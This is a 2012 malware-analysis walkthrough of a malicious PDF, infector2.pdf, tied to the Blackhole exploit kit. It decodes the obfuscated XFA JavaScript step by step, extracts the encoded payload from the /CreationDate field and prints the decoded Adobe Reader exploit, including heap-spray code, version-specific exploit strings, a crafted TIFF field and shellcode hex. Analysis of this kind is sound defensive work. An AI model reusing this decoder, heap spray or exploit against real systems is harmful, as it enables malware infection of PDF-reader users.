MalwareMustDie

Guide Step by Step of Analysis Malicious PDF: infector2.pdf

Nov 26th, 2012
  1. //=========================================
  2. // #MalwareMustDie | @unixfreaxjp ~]$ date
  3. // Mon Nov 26 16:35:46 JST 2012
  4. //
  5. // Guide Step by Step of Analysis Malicious PDF : infector2.pdf
  6. // With the decoding guide step by step
  7. // As per found in Case: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
  8. // Target is uploaded in VT at: https://www.virustotal.com/file/f3880c001bf094902f8a0a76e55cacd18555fe593dbe463f4aca9b4ad7050310/analysis/
  9. // *) the material contains dangerous code, but we hexed it, so it cannot be used as it is.
  10. //=========================================
  11.  
  12. ================================
  13.  
  14. CONFIRMING THE OBJECT
  15. ; Make sure we can spot the suspicious
  16. ; objects like JS or JavaScript..
  17.  
  18. =================================
  19.  
  20. // I always confirm it with the below
  21.  
  22. PDFiD 0.0.11 ./infector2.pdf
  23.  PDF Header: %PDF-1.6
  24.  obj                   27
  25.  endobj                27
  26.  stream                13
  27.  endstream             12
  28.  xref                   2
  29.  trailer                2
  30.  startxref              0
  31.  /Page                  2
  32.  /Encrypt               0
  33.  /ObjStm                0  // suspect the below...
  34.  /JS                    0  // <======== There...
  35.  /JavaScript            0  // <=========== there....
  36.  /AA                    0
  37.  /OpenAction            0
  38.  /AcroForm              1
  39.  /JBIG2Decode           0
  40.  /RichMedia             0
  41.  /Launch                0
  42.  /Colors > 2^24         0
  43.  %%EOF                  1
  44.  After last %%EOF       0
  45.  Total entropy:           6.410619 (     14769 bytes)
  46.  Entropy inside streams:  7.874169 (      3783 bytes)
  47.  Entropy outside streams: 5.203651 (     10986 bytes)
  48.  
  49. 0000   25 50 44 46 2D 31 2E 36 0D 25 E2 E3 CF D3 0D 0A    %PDF-1.6.%......
  50. 0010   35 32 20 30 20 6F 62 6A 3C 3C 2F 4C 65 6E 67 74    52 0 obj<</Lengt
  51. 0020   68 20 36 36 33 32 32 2F 52 6F 6F 74 20 31 20 30    h 66322/Root 1 0
  52. 0030   20 52 2F 49 6E 66 6F 20 33 20 30 20 52 25 2F 46     R/Info 3 0 R%/F
  53. 0040   69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63 6F 64    ilter/FlateDecod
  54. 0050   65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64 65 78    e/W[1 2 1]/Index
  55. 0060   5B 35 20 31 20 37 20 31 20 39 20 34 20 32 33 20    [5 1 7 1 9 4 23
  56. 0070   34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61 6D 0D    4 50 3]>>stream.
  57. 0080   2F 46 69 6C 74 65 72 2F 46 6C 61 74 65 44 65 63    /Filter/FlateDec
  58. 0090   6F 64 65 2F 57 5B 31 20 32 20 31 5D 2F 49 6E 64    ode/W[1 2 1]/Ind
  59. 00A0   65 78 5B 35 20 31 20 37 20 31 20 39 20 34 20 32    ex[5 1 7 1 9 4 2
  60. 00B0   33 20 34 20 35 30 20 33 5D 3E 3E 73 74 72 65 61    3 4 50 3]>>strea
  61. 00C0   6D 0D 78 DA 62 62 62 30 62 60 62 60 60 60 C4 47    m.x.bbb0b`b```.G
  62. 00D0   30 FE 02 12 FF D9 21 AC FF 0C 77 FF 33 31 30 5A    0.....!...w.310Z
  63. 00E0   83 B4 F5 32 00 04 18 00 77 1F 06 F5 0D 0A 65 6E    ...2....w.....en
  64. 00F0   64 73 74 72 65 61 6D 0D 65 6E 64 6F 62 6A 0D 31    dstream.endobj.1
  65. 0100   20 30 20 6F 62 6A 3C 3C 2F 4D 61 72 6B 49 6E 66     0 obj<</MarkInf
  66.  :                             :                                 :
  67.  
  68. ================================
  69.  
  70. DETECTING JAVASCRIPT
  71.  
  72. ; Check the JS's location first
  73. ; Note: there is a possibility of
  74. ; a scattered script, so read it carefully..
  75. ; My recommendation is to look at all the strings or
  76. ; use a hex editor to understand the address
  77. ; of the script.
  78.  
  79. ================================
  80.  
  81. // at address 0x2EBC-0x32E5 there is JS code
  82.  
  83. <xfa:script contentType='&#000000097;pplication/x-javascript'>
      // NOTE(review): the contentType is entity-encoded ("&#000000097;" is 'a'), so a
      // literal search for "application/x-javascript" misses this element; match the
      // decoded value (or the <xfa:script> tag itself) when hunting for script objects.
  84. /*
  85.  
  86. */
  87. with(event){
      // The /*...*/ fragments below only split tokens; the cleaned copy further down
      // is the same program with them stripped.
  88. l="l";
  89. ev=/*ewbwf*/"eva"/*/renyaerz*/;
  90. t=target;
  91. aa=/*/gbergern*/'co'+'de]';
  92. ind="indexOf";
  93. if(app.setProfile)if((app.setProfile+/**/"asvfa")[ind](aa)!=-1){k=t[/*czx*/ev/*qwdsa*/+l/*sgewgerj*/];}
  94. a=/**/t.creationDate.split('|')[0].substr(13);
  95. }
  96. s="";
  97. p=k("pars"+"eInt");
  98. z=a;
  99. e="de";
  100. ll="length";
  101. ss=/*bgre*/k("String");
  102. ff="from";
  103. ff+="Ch";
  104. ff+="arCo";
  105. ss=ss[ff/*x*/+e];
  106. xz=a.length;
  107. for(i=0;i&lt;xz;i+=2){
  108.     if (z[i]=='-')continue;
  109.     s=s+(ss(p(z[i]+z[i+1],0x1a)));
  110. }
  111. zx=k;
  112. zx(s);
  113. </xfa:script>
  114.  
  115. =================================
  116.  
  117. DECODING PREPARATION
  118.  
  119. =================================
  120.  
  121. // As previously decoded, strip the PDF tags and..
  122. // this is the generator code used for deobfuscating the obfuscated data
  123. // this script tries to fool virus scanning by scattering many /* comment */ tokens in there...
  124. // so just rewrite it and make it readable like this below:
  125.  
  126.  with(event)
        // Stage-1 decoder. Every name it needs is rebuilt from fragments so that no
        // tell-tale literal ("eval", "fromCharCode") appears in the file; signatures
        // should key on creationDate / setProfile / parseInt(..., 0x1a) instead.
  127.  {
  128.    l="l";
  129.    ev="eva";
  130.    t=target;
  131.    aa='co'+'de]';
  132.    ind="indexOf";
          // app.setProfile is stringified and searched for "code]" -- presumably a check
          // that it is a native function ("[native code]"), i.e. that the script runs in a
          // real Acrobat/Reader engine rather than an emulator. TODO confirm.
  133.    if(app.setProfile)if((app.setProfile+"asvfa")[ind](aa)!=-1)
  134.    {
            // k = target["eval"]
  135.      k=t[ev+l];
  136.    }
          // Payload is carried in the document's /CreationDate string: first '|'-separated
          // segment, minus a 13-character junk prefix.
  137.    a=t.creationDate.split('|')[0].substr(13);
  138.  }
  139.  s="";
        // p = parseInt, ss = String.fromCharCode (both resolved through eval)
  140.  p=k("pars"+"eInt");
  141.  z=a;
  142.  e="de";
  143.  ll="length";
  144.  ss=k("String");
  145.  ff="from";
  146.  ff+="Ch";
  147.  ff+="arCo";
  148.  ss=ss[ff+e];
  149.  xz=a.length;
        // Two input characters per output character, parsed as base-26 (0x1a). In the
        // data shown on this page every '-' sits at an even offset, and `continue` still
        // advances i by 2, so each separator AND the one filler character after it are
        // skipped. The first pairs "3J","48","48","1K" give 97,112,112,46 = "app." --
        // the start of the condensed second stage shown further down.
  150.  for(i=0;i&lt;xz;i+=2)
  151.  {
  152.    if (z[i]=='-')continue;
  153.    s=s+(ss(p(z[i]+z[i+1],0x1a)));
  154.  }
        // zx(s) == eval(s): executes the decoded second stage.
  155.  zx=k;
  156.  zx(s);
  157.  
  158.  
  159. ===============================
  160.  
  161. FIND THE OBFUSCATION DATA
  162. ; again... it may be scattered,
  163. ; please be careful
  164.  
  165. =================================
  166.  
  167. // it reads the data from the t.creationDate tag, so let's grep the strings :-)
  168. // then we find the data at address 0x1A1C as per below:
  169.  
  170. <<
  171.     /Title(asdasdsad)/CreationDate(%#^&*%^#@&%#@3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-6484414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744
251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H
2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27|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)
  172. >>
  173.  
  174. ====================================
  175.  
  176. ANALYZING THE PATTERN OF THE
  177. OBFUSCATION DATA
  178.  
  179. ; in an obfuscated JS infector it has to be -
  180. ; a generator, or shellcode, or
  181. ; maybe exploit strings...
  182. ; the amount of chars used and its
  183. ; origin data will make it easy to know the pattern & help us to
  184. ; analyze further
  185.  
  186. =====================================
  187.  
  188. // Again, see the data pattern first; it has the two patterns below,
  189. // a long one, which indicates to me an obfuscated code.
  190.  
  191. 148481K3J-8443N4A4C-8293N4E3N-4464C1K4C
  192. 33P1I1D1D-31F274E3J-04A16483J-53M3M4146
  193. 248474146-84C3N4A4B-93H3J1I16-041274E3J
  194. 71N291820-03L1O1M22-81M1M3O1M-7211N2324
  195. 81N201N20-41N201N1O-1221M1M1M-91M1M1M1M
  196. 11M1M1M20-61N201N20-81N201N20-01N201N20
  197. 71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D
  198.  
  199. // and this one, which by experience indicates to me a shellcode...
  200.  
  201. 683e4fcfc85e47534e95f33c0648b40308b40
  202. b762003f533c94941fcad03c533db0fbe1038
  203. 396ebf38b68088bf76a0559e898ffffffe2f9
  204. 281ec040100008d5c240cc7042472656773c7
  205. 41d0441516a006a0053576a00ff561485c075
  206.  
  207. // Then see the code here:
  208. //
  209. //    a=t.creationDate.split('|')[0].substr(13);
  210. //
  211. // So let's reverse it, going from the end:
  212. // substr(13) = just erase the first 13 chars,
  213. // a=t.creationDate.split('|') = makes an array for var a by splitting the data on "|"
  214. // So the "a" value becomes the two groups of data below:
  215.  
  216.  
  217. 3J-148481K3J-8443N4A4C-8293N4E3N-4464C1K4C-03J4A3P3N-44C1K3L4A-83N3J4C41-847462G3J-84C3N1K4B-64844414C-81E1D4K1D-91F3D1N3F-41K4A3N48-2443J3L3N-91E1L271L-33P1I1D1D-31F274E3J-04A16483J-53M3M4146-13P274E3J-64A163K3K-03K1I163L-43L3L1I16-43M3M3M1I-7163N3N3N-91I163O3O-53O1I163P-53P3P1I16-640404027-14E3J4A16-248474146-84C3N4A4B-93H3J1I16-041274E3J-44A164G16-22916463N-74F162D4A-24A3J4H1E-21F274E3J-54A164H16-02916463N-04F162D4A-64A3J4H1E-51F274E3J-34A163H44-71N291820-03L1O1M22-81M1M3O1M-7211N2324-61M203J1P-93L1O1M22-61M1M3O1M-63O221P24-51M203J3J-01P3N3K24-51M203J1P-51M1O1M24-51O203J22-23N1O3O24-11M203J20-81N201N20-41N201N1O-1221M1M1M-91M1M1M1M-71M1M1M1M-81M1M1M1M-31M1M1M1M-61M1M1M1M-01M1M1M1M-61M1M1M1N-31O1P2524-31M203J22-6201O1M22-91M1M3O1M-81M1M201M-11M1M1M20-61N201N20-81N201N20-01N201N20-61N201N18-61H3N4E3N-1464C1K4C-23J4A3P3N-54C1K3L4A-93N3J4C41-247462G3J-24C3N1K4B-44844414C-91E1D4K1D-51F3D1N3F-71K4A3N48-9443J3L3N-11E1L271L-13P1I1D1D-81F274E3J-84A163H44-91O291820-23L1O1M22-61M1M3O3J-121221P24-81M203J1P-93L1O1M22-41M1M3O25-6221O1N24-01M203J25-41M1N3O24-81M203J1P-71M251M24-520203J23-03M233N24-51M203J20-31N201N20-11N201N1O-9221M1M1M-81M1M1M1M-01M1M1M1M-31M1M1M1M-11M1M1M1M-61M1M1M1M-41M1M1M1M-81M1M1M23-41N242424-31M203J22-9201O1M22-71M1M3O1M-31M1M201M-01M1M1M20-61N201N20-51N201N20-61N201N20-91N201N18-51H3N4E3N-6464C1K4C-63J4A3P3N-24C1K3L4A-63N3J4C41-047462G3J-24C3N1K4B-54844414C-71E1D4K1D-21F3D1N3F-21K4A3N48-1443J3L3N-31E1L271L-13P1I1D1D-11F273H44-61P293J48-648273H44-42029463N-24F162D4A-04A3J4H1E-21F273O4D-8463L4C41-34746163H-444211E1F-54J4E3J4A-9163H4422-4293H441P-31K4E413N-64F3N4A38-23N4A4B41-347461K4C-247354C4A-041463P1E-91F273H44-622293H44-9221K4A3N-148443J3L-03N1E1D1K-41D1I1D1D-11F274F40-241443N1E-93H44221K-2443N463P-74C402820-21F3H4422-31H291D1M-51D274A3N-94C4D4A46-016483J4A-84B3N2L46-94C1E3H44-2221I1N1M-81F4L3O4D-5463L4C41-84746163H-644231E3H-444241I3H-244251F4J-94F404144-03N1E3H44-5241K443N-4463P4C40-41G1O283H-744251F3H-544241H29-23H442427-64A3N4C4D-94A46163H-
244241K4B-34D3K4B4C-04A41463P-41E1M1I3H-244251L1O-41F4L3O4D-4463L4C41-44746163H-92L1M1E3H-92L1N1F4J-33H2L1N29-94D463N4B-93L3J483N-51E3H2L1N-41F274A47-04C3N2G3J-243293H2L-21N1K443N-6463P4C40-81G1O273M-73J433447-74C3N294D-8463N4B3L-43J483N1E-41D1B4D25-51M251M1D-11F274B48-14A3J4H29-73H44231E-83M3J4334-0474C3N1I-01M4G1O1M-11M1M1J4A-0474C3N2G-63J431F27-344474G39-4403N3N29-23H2L1N1H-94B484A3J-44H274447-44G39403N-53N293H44-5231E4447-34G39403N-03N1I211O-9201M2524-31F273O47-44A1E4129-21M271641-116281620-21M1M2716-9411H1H1F-93H44203D-2413F2944-3474G3940-53N3N1K4B-74D3K4B4C-64A1E1M1I-644474G39-5403N3N1K-4443N463P-74C401J1N-71F1H3M3J-54334474C-93N274L3O-54D463L4C-041474616-43H2L1O1E-83H2L1N1I-0443N461F-04J4F4041-2443N1E3H-52L1N1K44-53N463P4C-74028443N-7461F3H2L-71N1H293H-32L1N274A-13N4C4D4A-946163H2L-41N1K4B4D-53K4B4C4A-041463P1E-51M1I443N-7461F4L3O-54D463L4C-041474616-53H2L1P1E-13H2L1N1F-74J4A3N4C-2291D1D27-63O474A1E-441291M27-141283H2L-31N1K443N-3463P4C40-627411H29-41O1F4J3K-9293H2L1N-41K4B4D3K-44B4C4A1E-1411I1O1F-8273L2948-13J4A4B3N-92L464C1E-63K1I1N22-01F274A3N-64C1H2935-94C4A4146-33P1K3O4A-547452F40-53J4A2F47-83M3N1E3L-71F274L4A-13N4C4D4A-546164A3N-24C4L3O4D-1463L4C41-24746163H-542411N1E-03H2L1N1I-63H2L201F-34J3H2L21-4291D1D27-73O474A1E-73H2L2229-01M273H2L-422283H2L-11N1K443N-1463P4C40-0273H2L22-71H1H1F4J-53H442529-93H2L201K-0443N463P-44C40273H-72L23293H-02L1N1K3L-0403J4A2F-8473M3N2D-34C1E3H2L-7221F273H-32L24293H-32L201K3L-4403J4A2F-4473M3N2D-84C1E3H2L-8221B3H44-8251F273H-32L211H29-5354C4A41-8463P1K3O-94A47452F-9403J4A2F-5473M3N1E-73H2L233G-63H2L241F-5274L4A3N-34C4D4A46-9163H2L21-84L3O4D46-53L4C4147-846163H2L-3251E3H2L-6221F4J3H-0421M293H-72L221K4C-347354C4A-041463P1E-91N221F27-33H421N29-53H421M1K-6443N463P-74C40273H-82L21291E-23H421N1B-31O1F2B1D-81M1D1H3H-0421M263H-1421M274A-13N4C4D4A-646163H2L-2214L3O4D-3463L4C41-74746163H-7421O1E3H-22L1N1F4J-33H2L2129-41D1D273O-5474A1E3H-42L22291M-2273H2L22-2283H2L1N-41K443N46-83P4C4027-93H2L221H-4291O1F4J-73H2L211H-4291D1B4D-61D273H2L-
7211H293H-82L251E3H-32L1N1K3L-5403J4A2F-5473M3N2D-34C1E3H2L-8221H1N1F-81F273H2L-1211H293H-82L251E3H-22L1N1K3L-5403J4A2F-6473M3N2D-44C1E3H2L-8221F1F4L-34A3N4C4D-34A46163H-02L214L3O-84D463L4C-741474616-73H421P1E-41F4J3H42-120293H44-9211E1F27-8413O1E3H-142202825-81M1M1M1F-44J3H4221-9291D471H-34D2D3542-03P3P3P43-6484D2O20-12E2N1L1L-31L1L1L4F-12D2D2D2D-82E2D2D2D-62D2D2D2D-12D2D2D2D-82D332D2D-02D2D2D2D-22D2D3O40-03J2D3541-72D3P3B2D-825242H2L-62E2N1D27-53H422229-43H441N27-93H422329-73H2L1P1E-43H42221F-64L3N444B-43N4J3H42-121291D43-02E1H2D35-542413340-92H48253O-1472E2N1L-41L1L1L1L-44F2D2D2D-02D2E2D2D-92D2D2D2D-62D2D2D2D-82D2D332D-22D2D2D2D-22D2D2D3B-24G2F2D35-2412D3P3B-02D1L3O2H-3202E2N1D-0273H4222-2293H441O-5273H4223-1293H2L1P-91E3H4222-61F4L3H42-724291D35-43743492D-22G3P3P2D-92D2E2E1D-1273H4225-8293H2L1O-51E1D3337-72I2E1D1I-91N1M2524-7201F273H-344441M29-11D33333L-92D2D2D2H-92G2D2D2H-72D2D2D2D-14F2L2D2D-02D2D332H-32G2D2D2H-02D2D2D2D-42E2D2D2D-72D2D4F2H-42G2D2D2H-62D2D2D2D-82E2D2D2D-92D2E3P2H-62G2D2D2H-02D2D2D2D-72E2D2D2D-92D2H332H-02H2D2D2H-52D2D2D2D-92L2D2D2D-62D2I4F2H-92H2D2D2H-82D2D2D2D-04F2L2D2D-72D372D2H-32G2D2P4F-72D2D2D2F-9352L2D2D-32D2D2D2D-22D2D2D2D-02P2G2D42-21L1L1L1L-31L1D273H-744441N29-33H42241H-33H42251H-23H44441M-51H3H4221-7273H4444-01O293H42-1411N1E3H-342231I1D-81D1F2741-13O1E3H44-2441O1K44-03N463P4C-8401B1O1F-13H44441O-21H294D46-33N4B3L3J-0483N1E1D-91B1M1M1D-21F273H44-8441P293H-9421O1E3H-144441O1F-4274F414C-8401E4J43-0263H4444-71P4L1F3H-32L1M1E43-01F272L45-13J3P3N2I-6413N443M-91N1K4A3J-44F383J44-24D3N293H-244441N4L-23H421P1E-91F27
  218.  
  219. // and next one is....
  220.  
  221. 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
  222.  
  223. //So put the above data (FIRST ARRAY ONLY) into variable a, and run the rest (below) of the script;
  224.  
  225.  s="";
        // Re-run of the stage-1 decoder with `a` preset to the FIRST '|' segment shown
        // above. `k` must still be bound to eval for the two k(...) lookups to resolve;
        // in a browser harness bind k = eval (or replace the two lines) before running.
  226.  p=k("pars"+"eInt");
  227.  z=a;
  228.  e="de";
  229.  ll="length";
  230.  ss=k("String");
  231.  ff="from";
  232.  ff+="Ch";
  233.  ff+="arCo";
  234.  ss=ss[ff+e];
  235.  xz=a.length;
        // Base-26 pair decoder; '-' plus the following filler char are skipped together.
  236.  for(i=0;i&lt;xz;i+=2)
  237.  {
  238.    if (z[i]=='-')continue;
  239.    s=s+(ss(p(z[i]+z[i+1],0x1a)));
  240.  }
  241.  
  242. // zx=k;  <-- we don't need this mumbo jumbo;
  243. // zx(s);     instead just burp out the result of the s variable as per below:
  244.  
  245. eval (s);  // or print it with ==> document.write(s); the decoded text is in s, and printing keeps the analysis passive
  246.  
  247.  
  248. // it will burp out two eval() values,
  249. // one is ..... just ignore it...
  250. // and the other value is the condensed code as per below:
  251.  
  252. app.alert=event.target.creationDate.split('|')[1].replace(/;/g,'');var padding;var bbb,ccc,ddd,eee,fff,ggg,hhh;var pointers_a,i;var x=new Array();var y=new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+event.target.creationDate.split('|')[1].replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0;i<400;i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c)}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8)}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function 
_j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
  253.  
  254.  
  255. //We make it beautiful to read as per below:  ;-)
  256.  
  257.  app.alert = event.target.creationDate.split('|')[1].replace(/; /g, '');
        // NOTE(review): the condensed dump above reads replace(/;/g,'') with no space; the
        // "; " here looks like a beautifier artifact and would leave the ';' characters in.
        // This assigns (does not call) app.alert; the intent of that is unclear from here.
        // The SECOND '|' segment of /CreationDate is the shellcode hex (see the sections below).
  258.  var padding;
  259.  var bbb, ccc, ddd, eee, fff, ggg, hhh;
